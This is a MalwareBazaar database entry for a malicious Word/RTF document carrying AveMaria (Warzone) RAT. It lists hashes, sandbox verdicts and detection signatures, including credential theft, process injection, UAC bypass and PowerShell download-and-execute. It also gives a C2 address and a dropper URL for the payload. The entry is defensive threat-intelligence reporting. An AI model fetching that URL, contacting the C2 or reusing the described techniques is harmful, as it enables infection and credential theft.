MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AveMariaRAT


Vendor detections: 10


Intelligence 10 IOCs YARA 2 File information Comments

SHA256 hash: 7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
SHA3-384 hash: 35c37473e7a9d9a701653d616a51172f2c97ea44c8adedda06ef915b79be2c9dd4b5775ffb3ec529496cf540c5c7904b
SHA1 hash: f6a98ac4e50a89495626b5eaebb85d1116554faa
MD5 hash: 84c45c2b0e94b8d1d064e739150ba84c
humanhash: freddie-mango-yellow-burger
File name:catalogue_2021_samples_list_revise_ol.doc
Download: download sample
Signature AveMariaRAT
File size:548'674 bytes
First seen:2021-09-28 09:21:12 UTC
Last seen:Never
File type:Word file doc
MIME type:text/plain
ssdeep 12288:z////////////////////////////////////CAggMdzFHRsU0:evRsU0
TLSH T16BC4AFD458DA80A6B98105DDD9C0F44D9820FED1355FDE28C7AECC73AE596F8AEC408B
Reporter @abuse_ch
Tags:AveMariaRAT doc

Intelligence


File Origin
# of uploads :
1
# of downloads :
116
Origin country :
FR FR
Mail intelligence
No data
Vendor Threat Intelligence
ID:
1
File name:
catalogue_2021_samples_list_revise_ol.doc
Verdict:
Malicious activity
Analysis date:
2021-09-28 10:30:48 UTC
Tags:
ole-embedded trojan opendir loader

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
File type:
application/msword
Has a screenshot:
False
Contains macros:
False
Result
Verdict:
Malicious
File Type:
Fake RTF File
Alert level:
9%
Result
Threat name:
AveMaria UACMe
Detection:
malicious
Classification:
phis.troj.spyw.expl.evad
Score:
100 / 100
Signature
.NET source code contains potential unpacker
.NET source code contains very large strings
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Found malware configuration
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office creates scripting files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
Behaviour
Behavior Graph:
behaviorgraph top1 signatures2 2 Behavior Graph ID: 492615 Sample: catalogue_2021_samples_list... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 22 other signatures 2->66 8 WINWORD.EXE 306 49 2->8         started        process3 dnsIp4 52 13.92.100.208, 49167, 49168, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->52 42 C:\Users\user\AppData\Local\...\doc[1].exe, PE32 8->42 dropped 44 C:\Users\user\AppData\...\abdtfhghgeghDh .ScT, data 8->44 dropped 46 C:\Users\user\AppData\Local\...\160C60F1.png, 370 8->46 dropped 76 Document exploit detected (creates forbidden files) 8->76 78 Suspicious powershell command line found 8->78 80 Tries to download and execute files (via powershell) 8->80 82 Microsoft Office creates scripting files 8->82 13 powershell.exe 12 8 8->13         started        16 powershell.exe 6 8->16         started        20 notepad.exe 8->20         started        22 2 other processes 8->22 file5 signatures6 process7 dnsIp8 48 C:\Users\user\AppData\Roaming\doc.exe, PE32 13->48 dropped 24 doc.exe 3 13->24         started        50 13.92.100.20 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->50 56 Powershell drops PE file 16->56 58 Injects files into Windows application 20->58 file9 signatures10 process11 file12 38 C:\Users\user\AppData\Roaming\maBdogbw.exe, PE32 24->38 dropped 40 C:\Users\user\AppData\Local\...\tmp2C00.tmp, XML 24->40 dropped 68 Multi AV Scanner detection for dropped file 24->68 70 Machine Learning detection for dropped file 24->70 72 Contains functionality to inject threads in other processes 24->72 74 4 other signatures 24->74 28 doc.exe 3 2 24->28         started        32 schtasks.exe 24->32         started        34 doc.exe 24->34         started        36 doc.exe 24->36         started        signatures13 process14 dnsIp15 54 152.67.253.163, 49169, 5300 ORACLE-BMC-31898US United States 28->54 84 Increases the number of concurrent connection per server for Internet Explorer 28->84 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->86 signatures16
Threat name:
Script-WScript.Trojan.RTFObfustream
Status:
Malicious
First seen:
2021-09-28 09:15:38 UTC
AV detection:
14 of 45 (31.11%)
Threat level:
  5/5
Result
Malware family:
warzonerat
Score:
  10/10
Tags:
family:warzonerat infostealer rat suricata
Behaviour
Checks processor information in registry
Creates scheduled task(s)
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
NTFS ADS
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Enumerates physical storage devices
Program crash
Drops file in Windows directory
Suspicious use of SetThreadContext
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Warzone RAT Payload
Process spawned unexpected child process
WarzoneRat, AveMaria
suricata: ET MALWARE Possible Malicious Macro DL EXE Feb 2016
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Malware Config
C2 Extraction:
152.67.253.163:5300
Dropper Extraction:
httP://13.92.100.208/doc/doc.exe

YARA Signatures


MalareBazaar uses YARA rules from several public and non-public repositories, such as Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious proccess dumps they may create. Please note that only results from TLP:WHITE rules are being displayeyd.

Rule name:INDICATOR_RTF_Exploit_Scripting
Author:ditekSHen
Description:detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Rule name:INDICATOR_RTF_MalVer_Objects
Author:ditekSHen
Description:Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments